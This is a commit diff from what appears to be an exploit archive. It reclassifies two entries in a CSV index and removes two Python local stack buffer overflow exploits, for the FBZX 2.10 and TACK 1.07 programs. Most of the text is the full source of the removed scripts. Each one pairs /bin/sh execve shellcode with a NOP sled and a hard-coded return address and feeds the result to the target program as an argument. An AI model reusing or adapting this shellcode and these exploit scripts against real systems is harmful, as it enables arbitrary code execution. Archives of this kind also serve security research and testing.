DB: 2015-11-29

2015-11-29 05:03:06 +00:00 · 2015-11-29 05:03:06 +00:00 · 2270e92015
commit 2270e92015
parent f25ba13a4f
3 changed files with 2 additions and 99 deletions
--- a/files.csv
+++ b/files.csv
@ -34955,11 +34955,10 @@ id,file,description,date,author,platform,type,port
 38678,platforms/php/webapps/38678.txt,"WordPress WP Fastest Cache Plugin 0.8.4.8 - Blind SQL Injection",2015-11-11,"Kacper Szurek",php,webapps,0
 38679,platforms/php/webapps/38679.txt,"AlienVault Open Source SIEM (OSSIM) Multiple Cross Site Scripting Vulnerabilities",2013-07-25,xistence,php,webapps,0
 38680,platforms/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote,0
-38681,platforms/linux/local/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,local,0
+38681,platforms/linux/dos/38681.py,"FBZX 2.10 - Local Stack-Based Buffer Overflow",2015-11-11,"Juan Sacco",linux,dos,0
 38682,platforms/php/webapps/38682.txt,"Jahia xCM /engines/manager.jsp site Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
 38683,platforms/php/webapps/38683.txt,"Jahia xCM /administration/ Multiple Parameter XSS",2013-07-31,"High-Tech Bridge",php,webapps,0
-38685,platforms/linux/local/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
+38685,platforms/linux/dos/38685.py,"TACK 1.07 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,dos,0
 38686,platforms/linux/local/38686.py,"TUDU 0.82 - Local Stack-Based Buffer Overflow",2015-11-12,"Juan Sacco",linux,local,0
 38687,platforms/windows/dos/38687.py,"Sam Spade 1.14 - S-Lang Command Field SEH Overflow",2015-11-12,"Nipun Jaswal",windows,dos,0
 38688,platforms/php/webapps/38688.txt,"b374k Web Shell - CSRF Command Injection",2015-11-13,hyp3rlinx,php,webapps,0
 38689,platforms/php/webapps/38689.txt,"SilverStripe 'MemberLoginForm.php' Information Disclosure Vulnerability",2013-08-01,"Fara Rustein",php,webapps,0
--- a/platforms/linux/local/38681.py
+++ b/platforms/linux/local/38681.py
@ -1,48 +0,0 @@
 # Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
 # Program: fbzx - ZX Spectrum Emulator for X
 # Tested on: GNU/Linux - Kali Linux 2.0 x86
 #
 # Description: FBZX v2.10 and prior is prone to a stack-based buffer overflow
 # vulnerability because the application fails to perform adequate
 # boundary-checks on user-supplied input.
 #
 # An attacker could exploit this issue to execute arbitrary code in the
 # context of the application. Failed exploit attempts will result in a
 # denial-of-service condition.
 #
 # Vendor homepage: *http://www.rastersoft.com/ <http://www.rastersoft.com/>*
 # Kali Linux 2.0 package: http://repo.kali.org/kali/pool/contrib/f/fbzx/
 # MD5: 0fc1d2e9c374c1156b2b02186a9f8980
 import os,subprocess
 def run():
  try:
    print "# FBZX v2.10 Stack-Based Overflow by Juan Sacco"
    print "# It's Fuzzing time on unusable exploits"
    print "# This exploit is for educational purposes only"
    # Basic structure: JUNK + SHELLCODE + NOPS + EIP
    junk = "\x41"*8
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*5010
    eip = "\x10\xd3\xff\xbf"
    subprocess.call(["fbzx",'  ', junk + shellcode + nops + eip])
  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "FBZX not found!"
    else:
        print "Error executing exploit"
    raise
 def howtousage():
  print "Sorry, something went wrong"
  sys.exit(-1)
 if __name__ == '__main__':
  try:
    print "Exploit FBZX 2.10 Local Overflow Exploit"
    print "Author: Juan Sacco"
  except IndexError:
    howtousage()
 run()
--- a/platforms/linux/local/38685.py
+++ b/platforms/linux/local/38685.py
@ -1,48 +0,0 @@
 # Exploit Author: Juan Sacco - http://www.exploitpack.com <jsacco@exploitpack.com>
 # Program: tack - Terminal action checker
 # Tested on: GNU/Linux - Kali Linux 2.0 x86
 #
 # Description: TACK v1.07 and prior is prone to a stack-based buffer overflow
 # vulnerability because the application fails to perform adequate
 # boundary-checks on user-supplied input.
 #
 # An attacker could exploit this issue to execute arbitrary code in the
 # context of the application. Failed exploit attempts will result in a
 # denial-of-service condition.
 #
 # Vendor homepage: *http://www.z <http://www.rastersoft.com/>nyx.com <http://nyx.com>*
 # Kali Linux 2.0 package: pool/main/t/tack/tack_1.07-1_amd64.deb
 # MD5: 0fc1d2e9c374c1156b2b02186a9f8980
 import os,subprocess
 def run():
  try:
    print "# TACK v1.07 Stack-Based Overflow by Juan Sacco"
    print "# It's Fuzzing time on unusable exploits"
    print "# This exploit is for educational purposes only"
    # Basic structure: JUNK + SHELLCODE + NOPS + EIP
    junk = "\x41"*10
    shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
    nops = "\x90"*3022
    eip = "\x30\xd1\xff\xbf"
    subprocess.call(["tack",'  ', junk + shellcode + nops + eip])
  except OSError as e:
    if e.errno == os.errno.ENOENT:
        print "TACK not found!"
    else:
        print "Error executing exploit"
    raise
 def howtousage():
  print "Sorry, something went wrong"
  sys.exit(-1)
 if __name__ == '__main__':
  try:
    print "Exploit TACK 1.07 Local Overflow Exploit"
    print "Author: Juan Sacco"
  except IndexError:
    howtousage()
 run()